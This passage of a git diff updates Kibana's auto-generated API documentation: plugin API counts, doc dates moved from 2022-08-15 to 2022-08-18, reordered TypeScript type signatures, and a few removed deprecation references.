Editors](https://github.com/orgs/elastic/teams/kibana-vis-editors) | Expression Heatmap plugin adds a `heatmap` renderer and function to the expression plugin. The renderer will display the `heatmap` chart. | 105 | 0 | 101 | 3 | | | [Kibana Presentation](https://github.com/orgs/elastic/teams/kibana-presentation) | Adds 'image' function and renderer to expressions | 26 | 0 | 26 | 0 | | | [Vis Editors](https://github.com/orgs/elastic/teams/kibana-vis-editors) | Adds a `metric` renderer and function to the expression plugin. The renderer will display the `legacy metric` chart. | 48 | 0 | 48 | 1 | | | [Kibana Presentation](https://github.com/orgs/elastic/teams/kibana-presentation) | Adds 'metric' function and renderer to expressions | 32 | 0 | 27 | 0 | 
@@ -74,13 +74,13 @@ tags: ['contributor', 'dev', 'apidocs', 'kibana'] | | [Kibana Presentation](https://github.com/orgs/elastic/teams/kibana-presentation) | Adds 'revealImage' function and renderer to expressions | 14 | 0 | 14 | 3 | | | [Kibana Presentation](https://github.com/orgs/elastic/teams/kibana-presentation) | Adds 'shape' function and renderer to expressions | 148 | 0 | 146 | 0 | | | [Vis Editors](https://github.com/orgs/elastic/teams/kibana-vis-editors) | Expression Tagcloud plugin adds a `tagcloud` renderer and function to the expression plugin. The renderer will display the `Wordcloud` chart. | 7 | 0 | 7 | 0 | -| | [Vis Editors](https://github.com/orgs/elastic/teams/kibana-vis-editors) | Expression XY plugin adds a `xy` renderer and function to the expression plugin. The renderer will display the `xy` chart. | 151 | 0 | 141 | 12 | +| | [Vis Editors](https://github.com/orgs/elastic/teams/kibana-vis-editors) | Expression XY plugin adds a `xy` renderer and function to the expression plugin. The renderer will display the `xy` chart. | 152 | 0 | 142 | 11 | | | [App Services](https://github.com/orgs/elastic/teams/kibana-app-services) | Adds expression runtime to Kibana | 2183 | 17 | 1729 | 5 | | | [Kibana Core](https://github.com/orgs/elastic/teams/kibana-core) | - | 222 | 0 | 95 | 2 | | | [App Services](https://github.com/orgs/elastic/teams/kibana-app-services) | Index pattern fields and ambiguous values formatters | 288 | 5 | 249 | 3 | | | [Machine Learning UI](https://github.com/orgs/elastic/teams/ml-ui) | The file upload plugin contains components and services for uploading a file, analyzing its data, and then importing the data into an Elasticsearch index. Supported file types include CSV, TSV, newline-delimited JSON and GeoJSON. | 62 | 0 | 62 | 2 | -| | [@elastic/kibana-app-services](https://github.com/orgs/elastic/teams/team:AppServicesUx) | File upload, download, sharing, and serving over HTTP implementation in Kibana. 
| 222 | 0 | 3 | 2 | -| | [Fleet](https://github.com/orgs/elastic/teams/fleet) | - | 955 | 3 | 860 | 9 | +| | [@elastic/kibana-app-services](https://github.com/orgs/elastic/teams/team:AppServicesUx) | File upload, download, sharing, and serving over HTTP implementation in Kibana. | 236 | 0 | 3 | 2 | +| | [Fleet](https://github.com/orgs/elastic/teams/fleet) | - | 957 | 3 | 862 | 9 | | | [Kibana Core](https://github.com/orgs/elastic/teams/kibana-core) | - | 68 | 0 | 14 | 5 | | globalSearchBar | [Kibana Core](https://github.com/orgs/elastic/teams/kibana-core) | - | 0 | 0 | 0 | 0 | | globalSearchProviders | [Kibana Core](https://github.com/orgs/elastic/teams/kibana-core) | - | 0 | 0 | 0 | 0 | @@ -106,7 +106,7 @@ tags: ['contributor', 'dev', 'apidocs', 'kibana'] | | [Security detections response](https://github.com/orgs/elastic/teams/security-detections-response) | - | 202 | 0 | 90 | 49 | | logstash | [Logstash](https://github.com/orgs/elastic/teams/logstash) | - | 0 | 0 | 0 | 0 | | | [Vis Editors](https://github.com/orgs/elastic/teams/kibana-vis-editors) | - | 41 | 0 | 41 | 6 | -| | [GIS](https://github.com/orgs/elastic/teams/kibana-gis) | - | 255 | 0 | 252 | 25 | +| | [GIS](https://github.com/orgs/elastic/teams/kibana-gis) | - | 256 | 0 | 255 | 25 | | | [GIS](https://github.com/orgs/elastic/teams/kibana-gis) | - | 67 | 0 | 67 | 0 | | | [Machine Learning UI](https://github.com/orgs/elastic/teams/ml-ui) | This plugin provides access to the machine learning features provided by Elastic. | 244 | 9 | 71 | 30 | | | [Stack Monitoring](https://github.com/orgs/elastic/teams/stack-monitoring-ui) | - | 11 | 0 | 9 | 1 | 
@@ -144,7 +144,7 @@ tags: ['contributor', 'dev', 'apidocs', 'kibana'] | | [Kibana Telemetry](https://github.com/orgs/elastic/teams/kibana-telemetry) | - | 31 | 0 | 26 | 6 | | | [Kibana Telemetry](https://github.com/orgs/elastic/teams/kibana-telemetry) | - | 1 | 0 | 1 | 0 | | | [Kibana Telemetry](https://github.com/orgs/elastic/teams/kibana-telemetry) | - | 11 | 0 | 10 | 0 | -| | [Protections Experience Team](https://github.com/orgs/elastic/teams/protections-experience) | Elastic threat intelligence helps you see if you are open to or have been subject to current or historical known threats | 6 | 0 | 6 | 1 | +| | [Protections Experience Team](https://github.com/orgs/elastic/teams/protections-experience) | Elastic threat intelligence helps you see if you are open to or have been subject to current or historical known threats | 15 | 0 | 3 | 1 | | | [Security solution](https://github.com/orgs/elastic/teams/security-solution) | - | 447 | 1 | 342 | 32 | | | [Machine Learning UI](https://github.com/orgs/elastic/teams/ml-ui) | This plugin provides access to the transforms features provided by Elastic. Transforms enable you to convert existing Elasticsearch indices into summarized indices, which provide opportunities for new insights and analytics. | 4 | 0 | 4 | 1 | | translations | [Kibana Localization](https://github.com/orgs/elastic/teams/kibana-localization) | - | 0 | 0 | 0 | 0 | @@ -192,6 +192,7 @@ tags: ['contributor', 'dev', 'apidocs', 'kibana'] | | [Owner missing] | - | 11 | 0 | 11 | 0 | | | [Owner missing] | - | 10 | 0 | 10 | 0 | | | [Owner missing] | - | 18 | 0 | 9 | 1 | +| | [Owner missing] | - | 76 | 0 | 76 | 0 | | | [Owner missing] | - | 7 | 0 | 2 | 0 | | | [Owner missing] | - | 3 | 0 | 3 | 0 | | | [Owner missing] | - | 62 | 0 | 17 | 1 | diff --git a/api_docs/presentation_util.devdocs.json b/api_docs/presentation_util.devdocs.json index 07de3fd699575..c7d62fa7d2661 100644 --- a/api_docs/presentation_util.devdocs.json 
+++ b/api_docs/presentation_util.devdocs.json @@ -2264,7 +2264,7 @@ "label": "getProjects", "description": [], "signature": [ - "(solutions?: (\"presentation\" | \"dashboard\" | \"canvas\")[] | undefined) => Record<\"labs:dashboard:deferBelowFold\" | \"labs:dashboard:dashboardControls\" | \"labs:canvas:byValueEmbeddable\", ", + "(solutions?: (\"dashboard\" | \"canvas\" | \"presentation\")[] | undefined) => Record<\"labs:dashboard:deferBelowFold\" | \"labs:dashboard:dashboardControls\" | \"labs:canvas:byValueEmbeddable\", ", { "pluginId": "presentationUtil", "scope": "common", @@ -2285,7 +2285,7 @@ "label": "solutions", "description": [], "signature": [ - "(\"presentation\" | \"dashboard\" | \"canvas\")[] | undefined" + "(\"dashboard\" | \"canvas\" | \"presentation\")[] | undefined" ], "path": "src/plugins/presentation_util/public/services/labs.ts", "deprecated": false, @@ -3650,7 +3650,7 @@ "label": "solutions", "description": [], "signature": [ - "(\"presentation\" | \"dashboard\" | \"canvas\")[]" + "(\"dashboard\" | \"canvas\" | \"presentation\")[]" ], "path": "src/plugins/presentation_util/common/labs.ts", "deprecated": false @@ -3861,7 +3861,7 @@ "label": "SolutionName", "description": [], "signature": [ - "\"presentation\" | \"dashboard\" | \"canvas\"" + "\"dashboard\" | \"canvas\" | \"presentation\"" ], "path": "src/plugins/presentation_util/common/labs.ts", "deprecated": false, diff --git a/api_docs/presentation_util.mdx b/api_docs/presentation_util.mdx index b3f6432a189d7..a803432619749 100644 --- a/api_docs/presentation_util.mdx +++ b/api_docs/presentation_util.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/presentationUtil title: "presentationUtil" image: https://source.unsplash.com/400x175/?github description: API docs for the presentationUtil plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'presentationUtil'] --- import presentationUtilObj from './presentation_util.devdocs.json'; 
diff --git a/api_docs/remote_clusters.mdx b/api_docs/remote_clusters.mdx index 497431e2dc096..5d518b2c75b0d 100644 --- a/api_docs/remote_clusters.mdx +++ b/api_docs/remote_clusters.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/remoteClusters title: "remoteClusters" image: https://source.unsplash.com/400x175/?github description: API docs for the remoteClusters plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'remoteClusters'] --- import remoteClustersObj from './remote_clusters.devdocs.json'; diff --git a/api_docs/reporting.mdx b/api_docs/reporting.mdx index 2cf16933a1e68..442c61ad6812a 100644 --- a/api_docs/reporting.mdx +++ b/api_docs/reporting.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/reporting title: "reporting" image: https://source.unsplash.com/400x175/?github description: API docs for the reporting plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'reporting'] --- import reportingObj from './reporting.devdocs.json'; diff --git a/api_docs/rollup.mdx b/api_docs/rollup.mdx index 6a1368dee3285..f56a7960339b9 100644 --- a/api_docs/rollup.mdx +++ b/api_docs/rollup.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/rollup title: "rollup" image: https://source.unsplash.com/400x175/?github description: API docs for the rollup plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'rollup'] --- import rollupObj from './rollup.devdocs.json'; diff --git a/api_docs/rule_registry.devdocs.json b/api_docs/rule_registry.devdocs.json index 20d37238bea29..e2ef0bd007a6b 100644 --- a/api_docs/rule_registry.devdocs.json +++ b/api_docs/rule_registry.devdocs.json 
@@ -1500,9 +1500,9 @@ "section": "def-common.WithoutReservedActionGroups", "text": "WithoutReservedActionGroups" }, - ">) => Promise; id: string; name: string; validate?: { params?: ", + ">) => Promise; validate?: { params?: ", "RuleTypeParamsValidator", - " | undefined; } | undefined; cancelAlertsOnRuleTimeout?: boolean | undefined; actionGroups: ", + " | undefined; } | undefined; id: string; name: string; cancelAlertsOnRuleTimeout?: boolean | undefined; actionGroups: ", { "pluginId": "alerting", "scope": "common", diff --git a/api_docs/rule_registry.mdx b/api_docs/rule_registry.mdx index 5617920bb96b3..27e30d9e49be2 100644 --- a/api_docs/rule_registry.mdx +++ b/api_docs/rule_registry.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/ruleRegistry title: "ruleRegistry" image: https://source.unsplash.com/400x175/?github description: API docs for the ruleRegistry plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'ruleRegistry'] --- import ruleRegistryObj from './rule_registry.devdocs.json'; diff --git a/api_docs/runtime_fields.mdx b/api_docs/runtime_fields.mdx index 0bb8d03d1f878..bf3a03b0197cd 100644 --- a/api_docs/runtime_fields.mdx +++ b/api_docs/runtime_fields.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/runtimeFields title: "runtimeFields" image: https://source.unsplash.com/400x175/?github description: API docs for the runtimeFields plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'runtimeFields'] --- import runtimeFieldsObj from './runtime_fields.devdocs.json'; diff --git a/api_docs/saved_objects.devdocs.json b/api_docs/saved_objects.devdocs.json index fba13f71ed1cc..03027ee4ba3a3 100644 --- a/api_docs/saved_objects.devdocs.json +++ b/api_docs/saved_objects.devdocs.json 
@@ -735,7 +735,7 @@ "section": "def-public.SavedObject", "text": "SavedObject" }, - ", \"id\" | \"title\" | \"getDisplayName\" | \"lastSavedTitle\" | \"copyOnSave\" | \"getEsType\">, isTitleDuplicateConfirmed: boolean, onTitleDuplicate: (() => void) | undefined, services: Pick<", + ", \"title\" | \"id\" | \"getDisplayName\" | \"lastSavedTitle\" | \"copyOnSave\" | \"getEsType\">, isTitleDuplicateConfirmed: boolean, onTitleDuplicate: (() => void) | undefined, services: Pick<", "SavedObjectKibanaServices", ", \"overlays\" | \"savedObjectsClient\">) => Promise" ], @@ -758,7 +758,7 @@ "section": "def-public.SavedObject", "text": "SavedObject" }, - ", \"id\" | \"title\" | \"getDisplayName\" | \"lastSavedTitle\" | \"copyOnSave\" | \"getEsType\">" + ", \"title\" | \"id\" | \"getDisplayName\" | \"lastSavedTitle\" | \"copyOnSave\" | \"getEsType\">" ], "path": "src/plugins/saved_objects/public/saved_object/helpers/check_for_duplicate_title.ts", "deprecated": false, @@ -1449,22 +1449,6 @@ "plugin": "savedObjectsTaggingOss", "path": "src/plugins/saved_objects_tagging_oss/public/api.ts" }, - { - "plugin": "visualizations", - "path": "src/plugins/visualizations/public/utils/saved_objects_utils/display_duplicate_title_confirm_modal.ts" - }, - { - "plugin": "visualizations", - "path": "src/plugins/visualizations/public/utils/saved_objects_utils/display_duplicate_title_confirm_modal.ts" - }, - { - "plugin": "visualizations", - "path": "src/plugins/visualizations/public/utils/saved_objects_utils/check_for_duplicate_title.ts" - }, - { - "plugin": "visualizations", - "path": "src/plugins/visualizations/public/utils/saved_objects_utils/check_for_duplicate_title.ts" - }, { "plugin": "dashboard", "path": "src/plugins/dashboard/public/services/saved_object_loader.ts" 
@@ -1508,22 +1492,6 @@ { "plugin": "dashboard", "path": "src/plugins/dashboard/public/application/actions/clone_panel_action.tsx" - }, - { - "plugin": "lens", - "path": "x-pack/plugins/lens/public/persistence/saved_objects_utils/display_duplicate_title_confirm_modal.ts" - }, - { - "plugin": "lens", - "path": "x-pack/plugins/lens/public/persistence/saved_objects_utils/display_duplicate_title_confirm_modal.ts" - }, - { - "plugin": "lens", - "path": "x-pack/plugins/lens/public/persistence/saved_objects_utils/check_for_duplicate_title.ts" - }, - { - "plugin": "lens", - "path": "x-pack/plugins/lens/public/persistence/saved_objects_utils/check_for_duplicate_title.ts" } ], "children": [ diff --git a/api_docs/saved_objects.mdx b/api_docs/saved_objects.mdx index 8874a627fa3dc..198edc76a929d 100644 --- a/api_docs/saved_objects.mdx +++ b/api_docs/saved_objects.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/savedObjects title: "savedObjects" image: https://source.unsplash.com/400x175/?github description: API docs for the savedObjects plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'savedObjects'] --- import savedObjectsObj from './saved_objects.devdocs.json'; diff --git a/api_docs/saved_objects_management.devdocs.json b/api_docs/saved_objects_management.devdocs.json index 8d93367005c6c..a0876d761e9a5 100644 --- a/api_docs/saved_objects_management.devdocs.json +++ b/api_docs/saved_objects_management.devdocs.json 
@@ -278,7 +278,7 @@ "label": "euiColumn", "description": [], "signature": [ - "{ children?: React.ReactNode; color?: string | undefined; className?: string | undefined; height?: string | number | undefined; id?: string | undefined; lang?: string | undefined; name: React.ReactNode; style?: React.CSSProperties | undefined; width?: string | undefined; role?: React.AriaRole | undefined; tabIndex?: number | undefined; 'aria-activedescendant'?: string | undefined; 'aria-atomic'?: boolean | \"true\" | \"false\" | undefined; 'aria-autocomplete'?: \"none\" | \"list\" | \"inline\" | \"both\" | undefined; 'aria-busy'?: boolean | \"true\" | \"false\" | undefined; 'aria-checked'?: boolean | \"true\" | \"false\" | \"mixed\" | undefined; 'aria-colcount'?: number | undefined; 'aria-colindex'?: number | undefined; 'aria-colspan'?: number | undefined; 'aria-controls'?: string | undefined; 'aria-current'?: boolean | \"true\" | \"false\" | \"page\" | \"step\" | \"location\" | \"date\" | \"time\" | undefined; 'aria-describedby'?: string | undefined; 'aria-details'?: string | undefined; 'aria-disabled'?: boolean | \"true\" | \"false\" | undefined; 'aria-dropeffect'?: \"none\" | \"link\" | \"copy\" | \"execute\" | \"move\" | \"popup\" | undefined; 'aria-errormessage'?: string | undefined; 'aria-expanded'?: boolean | \"true\" | \"false\" | undefined; 'aria-flowto'?: string | undefined; 'aria-grabbed'?: boolean | \"true\" | \"false\" | undefined; 'aria-haspopup'?: boolean | \"dialog\" | \"grid\" | \"listbox\" | \"menu\" | \"tree\" | \"true\" | \"false\" | undefined; 'aria-hidden'?: boolean | \"true\" | \"false\" | undefined; 'aria-invalid'?: boolean | \"true\" | \"false\" | \"grammar\" | \"spelling\" | undefined; 'aria-keyshortcuts'?: string | undefined; 'aria-label'?: string | undefined; 'aria-labelledby'?: string | undefined; 'aria-level'?: number | undefined; 'aria-live'?: \"off\" | \"assertive\" | \"polite\" | undefined; 'aria-modal'?: boolean | \"true\" | \"false\" | undefined; 
'aria-multiline'?: boolean | \"true\" | \"false\" | undefined; 'aria-multiselectable'?: boolean | \"true\" | \"false\" | undefined; 'aria-orientation'?: \"horizontal\" | \"vertical\" | undefined; 'aria-owns'?: string | undefined; 'aria-placeholder'?: string | undefined; 'aria-posinset'?: number | undefined; 'aria-pressed'?: boolean | \"true\" | \"false\" | \"mixed\" | undefined; 'aria-readonly'?: boolean | \"true\" | \"false\" | undefined; 'aria-relevant'?: \"all\" | \"text\" | \"additions\" | \"additions removals\" | \"additions text\" | \"removals\" | \"removals additions\" | \"removals text\" | \"text additions\" | \"text removals\" | undefined; 'aria-required'?: boolean | \"true\" | \"false\" | undefined; 'aria-roledescription'?: string | undefined; 'aria-rowcount'?: number | undefined; 'aria-rowindex'?: number | undefined; 'aria-rowspan'?: number | undefined; 'aria-selected'?: boolean | \"true\" | \"false\" | undefined; 'aria-setsize'?: number | undefined; 'aria-sort'?: \"none\" | \"ascending\" | \"descending\" | \"other\" | undefined; 'aria-valuemax'?: number | undefined; 'aria-valuemin'?: number | undefined; 'aria-valuenow'?: number | undefined; 'aria-valuetext'?: string | undefined; dangerouslySetInnerHTML?: { __html: string; } | undefined; onCopy?: React.ClipboardEventHandler | undefined; onCopyCapture?: React.ClipboardEventHandler | undefined; onCut?: React.ClipboardEventHandler | undefined; onCutCapture?: React.ClipboardEventHandler | undefined; onPaste?: React.ClipboardEventHandler | undefined; onPasteCapture?: React.ClipboardEventHandler | undefined; onCompositionEnd?: React.CompositionEventHandler | undefined; onCompositionEndCapture?: React.CompositionEventHandler | undefined; onCompositionStart?: React.CompositionEventHandler | undefined; onCompositionStartCapture?: React.CompositionEventHandler | undefined; onCompositionUpdate?: React.CompositionEventHandler | undefined; onCompositionUpdateCapture?: React.CompositionEventHandler | undefined; 
onFocus?: React.FocusEventHandler | undefined; onFocusCapture?: React.FocusEventHandler | undefined; onBlur?: React.FocusEventHandler | undefined; onBlurCapture?: React.FocusEventHandler | undefined; onChange?: React.FormEventHandler | undefined; onChangeCapture?: React.FormEventHandler | undefined; onBeforeInput?: React.FormEventHandler | undefined; onBeforeInputCapture?: React.FormEventHandler | undefined; onInput?: React.FormEventHandler | undefined; onInputCapture?: React.FormEventHandler | undefined; onReset?: React.FormEventHandler | undefined; onResetCapture?: React.FormEventHandler | undefined; onSubmit?: React.FormEventHandler | undefined; onSubmitCapture?: React.FormEventHandler | undefined; onInvalid?: React.FormEventHandler | undefined; onInvalidCapture?: React.FormEventHandler | undefined; onLoad?: React.ReactEventHandler | undefined; onLoadCapture?: React.ReactEventHandler | undefined; onError?: React.ReactEventHandler | undefined; onErrorCapture?: React.ReactEventHandler | undefined; onKeyDown?: React.KeyboardEventHandler | undefined; onKeyDownCapture?: React.KeyboardEventHandler | undefined; onKeyPress?: React.KeyboardEventHandler | undefined; onKeyPressCapture?: React.KeyboardEventHandler | undefined; onKeyUp?: React.KeyboardEventHandler | undefined; onKeyUpCapture?: React.KeyboardEventHandler | undefined; onAbort?: React.ReactEventHandler | undefined; onAbortCapture?: React.ReactEventHandler | undefined; onCanPlay?: React.ReactEventHandler | undefined; onCanPlayCapture?: React.ReactEventHandler | undefined; onCanPlayThrough?: React.ReactEventHandler | undefined; onCanPlayThroughCapture?: React.ReactEventHandler | undefined; onDurationChange?: React.ReactEventHandler | undefined; onDurationChangeCapture?: React.ReactEventHandler | undefined; onEmptied?: React.ReactEventHandler | undefined; onEmptiedCapture?: React.ReactEventHandler | undefined; onEncrypted?: React.ReactEventHandler | undefined; onEncryptedCapture?: React.ReactEventHandler | 
undefined; onEnded?: React.ReactEventHandler | undefined; onEndedCapture?: React.ReactEventHandler | undefined; onLoadedData?: React.ReactEventHandler | undefined; onLoadedDataCapture?: React.ReactEventHandler | undefined; onLoadedMetadata?: React.ReactEventHandler | undefined; onLoadedMetadataCapture?: React.ReactEventHandler | undefined; onLoadStart?: React.ReactEventHandler | undefined; onLoadStartCapture?: React.ReactEventHandler | undefined; onPause?: React.ReactEventHandler | undefined; onPauseCapture?: React.ReactEventHandler | undefined; onPlay?: React.ReactEventHandler | undefined; onPlayCapture?: React.ReactEventHandler | undefined; onPlaying?: React.ReactEventHandler | undefined; onPlayingCapture?: React.ReactEventHandler | undefined; onProgress?: React.ReactEventHandler | undefined; onProgressCapture?: React.ReactEventHandler | undefined; onRateChange?: React.ReactEventHandler | undefined; onRateChangeCapture?: React.ReactEventHandler | undefined; onSeeked?: React.ReactEventHandler | undefined; onSeekedCapture?: React.ReactEventHandler | undefined; onSeeking?: React.ReactEventHandler | undefined; onSeekingCapture?: React.ReactEventHandler | undefined; onStalled?: React.ReactEventHandler | undefined; onStalledCapture?: React.ReactEventHandler | undefined; onSuspend?: React.ReactEventHandler | undefined; onSuspendCapture?: React.ReactEventHandler | undefined; onTimeUpdate?: React.ReactEventHandler | undefined; onTimeUpdateCapture?: React.ReactEventHandler | undefined; onVolumeChange?: React.ReactEventHandler | undefined; onVolumeChangeCapture?: React.ReactEventHandler | undefined; onWaiting?: React.ReactEventHandler | undefined; onWaitingCapture?: React.ReactEventHandler | undefined; onAuxClick?: React.MouseEventHandler | undefined; onAuxClickCapture?: React.MouseEventHandler | undefined; onClick?: React.MouseEventHandler | undefined; onClickCapture?: React.MouseEventHandler | undefined; onContextMenu?: React.MouseEventHandler | undefined; 
onContextMenuCapture?: React.MouseEventHandler | undefined; onDoubleClick?: React.MouseEventHandler | undefined; onDoubleClickCapture?: React.MouseEventHandler | undefined; onDrag?: React.DragEventHandler | undefined; onDragCapture?: React.DragEventHandler | undefined; onDragEnd?: React.DragEventHandler | undefined; onDragEndCapture?: React.DragEventHandler | undefined; onDragEnter?: React.DragEventHandler | undefined; onDragEnterCapture?: React.DragEventHandler | undefined; onDragExit?: React.DragEventHandler | undefined; onDragExitCapture?: React.DragEventHandler | undefined; onDragLeave?: React.DragEventHandler | undefined; onDragLeaveCapture?: React.DragEventHandler | undefined; onDragOver?: React.DragEventHandler | undefined; onDragOverCapture?: React.DragEventHandler | undefined; onDragStart?: React.DragEventHandler | undefined; onDragStartCapture?: React.DragEventHandler | undefined; onDrop?: React.DragEventHandler | undefined; onDropCapture?: React.DragEventHandler | undefined; onMouseDown?: React.MouseEventHandler | undefined; onMouseDownCapture?: React.MouseEventHandler | undefined; onMouseEnter?: React.MouseEventHandler | undefined; onMouseLeave?: React.MouseEventHandler | undefined; onMouseMove?: React.MouseEventHandler | undefined; onMouseMoveCapture?: React.MouseEventHandler | undefined; onMouseOut?: React.MouseEventHandler | undefined; onMouseOutCapture?: React.MouseEventHandler | undefined; onMouseOver?: React.MouseEventHandler | undefined; onMouseOverCapture?: React.MouseEventHandler | undefined; onMouseUp?: React.MouseEventHandler | undefined; onMouseUpCapture?: React.MouseEventHandler | undefined; onSelect?: React.ReactEventHandler | undefined; onSelectCapture?: React.ReactEventHandler | undefined; onTouchCancel?: React.TouchEventHandler | undefined; onTouchCancelCapture?: React.TouchEventHandler | undefined; onTouchEnd?: React.TouchEventHandler | undefined; onTouchEndCapture?: React.TouchEventHandler | undefined; onTouchMove?: 
React.TouchEventHandler | undefined; onTouchMoveCapture?: React.TouchEventHandler | undefined; onTouchStart?: React.TouchEventHandler | undefined; onTouchStartCapture?: React.TouchEventHandler | undefined; onPointerDown?: React.PointerEventHandler | undefined; onPointerDownCapture?: React.PointerEventHandler | undefined; onPointerMove?: React.PointerEventHandler | undefined; onPointerMoveCapture?: React.PointerEventHandler | undefined; onPointerUp?: React.PointerEventHandler | undefined; onPointerUpCapture?: React.PointerEventHandler | undefined; onPointerCancel?: React.PointerEventHandler | undefined; onPointerCancelCapture?: React.PointerEventHandler | undefined; onPointerEnter?: React.PointerEventHandler | undefined; onPointerEnterCapture?: React.PointerEventHandler | undefined; onPointerLeave?: React.PointerEventHandler | undefined; onPointerLeaveCapture?: React.PointerEventHandler | undefined; onPointerOver?: React.PointerEventHandler | undefined; onPointerOverCapture?: React.PointerEventHandler | undefined; onPointerOut?: React.PointerEventHandler | undefined; onPointerOutCapture?: React.PointerEventHandler | undefined; onGotPointerCapture?: React.PointerEventHandler | undefined; onGotPointerCaptureCapture?: React.PointerEventHandler | undefined; onLostPointerCapture?: React.PointerEventHandler | undefined; onLostPointerCaptureCapture?: React.PointerEventHandler | undefined; onScroll?: React.UIEventHandler | undefined; onScrollCapture?: React.UIEventHandler | undefined; onWheel?: React.WheelEventHandler | undefined; onWheelCapture?: React.WheelEventHandler | undefined; onAnimationStart?: React.AnimationEventHandler | undefined; onAnimationStartCapture?: React.AnimationEventHandler | undefined; onAnimationEnd?: React.AnimationEventHandler | undefined; onAnimationEndCapture?: React.AnimationEventHandler | undefined; onAnimationIteration?: React.AnimationEventHandler | undefined; onAnimationIterationCapture?: React.AnimationEventHandler | undefined; 
onTransitionEnd?: React.TransitionEventHandler | undefined; onTransitionEndCapture?: React.TransitionEventHandler | undefined; 'data-test-subj'?: string | undefined; title?: string | undefined; render?: ((value: any, record: ", + "{ children?: React.ReactNode; onError?: React.ReactEventHandler | undefined; render?: ((value: any, record: ", { "pluginId": "savedObjectsManagement", "scope": "public", @@ -286,7 +286,7 @@ "section": "def-public.SavedObjectsManagementRecord", "text": "SavedObjectsManagementRecord" }, - ") => React.ReactNode) | undefined; hidden?: boolean | undefined; description?: string | undefined; security?: string | undefined; field: (string & {}) | keyof ", + ") => React.ReactNode) | undefined; hidden?: boolean | undefined; color?: string | undefined; className?: string | undefined; title?: string | undefined; onChange?: React.FormEventHandler | undefined; onKeyDown?: React.KeyboardEventHandler | undefined; onClick?: React.MouseEventHandler | undefined; id?: string | undefined; description?: string | undefined; security?: string | undefined; name: React.ReactNode; field: (string & {}) | keyof ", { "pluginId": "savedObjectsManagement", "scope": "public", 
@@ -294,7 +294,7 @@ "section": "def-public.SavedObjectsManagementRecord", "text": "SavedObjectsManagementRecord" }, - "; defaultValue?: string | number | readonly string[] | undefined; defaultChecked?: boolean | undefined; suppressContentEditableWarning?: boolean | undefined; suppressHydrationWarning?: boolean | undefined; accessKey?: string | undefined; contentEditable?: \"inherit\" | Booleanish | undefined; contextMenu?: string | undefined; dir?: string | undefined; draggable?: Booleanish | undefined; placeholder?: string | undefined; slot?: string | undefined; spellCheck?: Booleanish | undefined; translate?: \"no\" | \"yes\" | undefined; radioGroup?: string | undefined; about?: string | undefined; datatype?: string | undefined; inlist?: any; prefix?: string | undefined; property?: string | undefined; resource?: string | undefined; typeof?: string | undefined; vocab?: string | undefined; autoCapitalize?: string | undefined; autoCorrect?: string | undefined; autoSave?: string | undefined; itemProp?: string | undefined; itemScope?: boolean | undefined; itemType?: string | undefined; itemID?: string | undefined; itemRef?: string | undefined; results?: number | undefined; unselectable?: \"off\" | \"on\" | undefined; inputMode?: \"none\" | \"text\" | \"search\" | \"email\" | \"tel\" | \"url\" | \"numeric\" | \"decimal\" | undefined; is?: string | undefined; readOnly?: boolean | undefined; align?: ", + "; defaultValue?: string | number | readonly string[] | undefined; lang?: string | undefined; defaultChecked?: boolean | undefined; suppressContentEditableWarning?: boolean | undefined; suppressHydrationWarning?: boolean | undefined; accessKey?: string | undefined; contentEditable?: \"inherit\" | Booleanish | undefined; contextMenu?: string | undefined; dir?: string | undefined; draggable?: Booleanish | undefined; placeholder?: string | undefined; slot?: string | undefined; spellCheck?: Booleanish | undefined; style?: React.CSSProperties | undefined; tabIndex?: number | 
undefined; translate?: \"no\" | \"yes\" | undefined; radioGroup?: string | undefined; role?: React.AriaRole | undefined; about?: string | undefined; datatype?: string | undefined; inlist?: any; prefix?: string | undefined; property?: string | undefined; resource?: string | undefined; typeof?: string | undefined; vocab?: string | undefined; autoCapitalize?: string | undefined; autoCorrect?: string | undefined; autoSave?: string | undefined; itemProp?: string | undefined; itemScope?: boolean | undefined; itemType?: string | undefined; itemID?: string | undefined; itemRef?: string | undefined; results?: number | undefined; unselectable?: \"on\" | \"off\" | undefined; inputMode?: \"none\" | \"email\" | \"search\" | \"text\" | \"tel\" | \"url\" | \"numeric\" | \"decimal\" | undefined; is?: string | undefined; 'aria-activedescendant'?: string | undefined; 'aria-atomic'?: boolean | \"false\" | \"true\" | undefined; 'aria-autocomplete'?: \"none\" | \"list\" | \"inline\" | \"both\" | undefined; 'aria-busy'?: boolean | \"false\" | \"true\" | undefined; 'aria-checked'?: boolean | \"mixed\" | \"false\" | \"true\" | undefined; 'aria-colcount'?: number | undefined; 'aria-colindex'?: number | undefined; 'aria-colspan'?: number | undefined; 'aria-controls'?: string | undefined; 'aria-current'?: boolean | \"date\" | \"location\" | \"time\" | \"page\" | \"false\" | \"true\" | \"step\" | undefined; 'aria-describedby'?: string | undefined; 'aria-details'?: string | undefined; 'aria-disabled'?: boolean | \"false\" | \"true\" | undefined; 'aria-dropeffect'?: \"none\" | \"copy\" | \"link\" | \"execute\" | \"move\" | \"popup\" | undefined; 'aria-errormessage'?: string | undefined; 'aria-expanded'?: boolean | \"false\" | \"true\" | undefined; 'aria-flowto'?: string | undefined; 'aria-grabbed'?: boolean | \"false\" | \"true\" | undefined; 'aria-haspopup'?: boolean | \"grid\" | \"menu\" | \"false\" | \"true\" | \"dialog\" | \"listbox\" | \"tree\" | undefined; 'aria-hidden'?: boolean | 
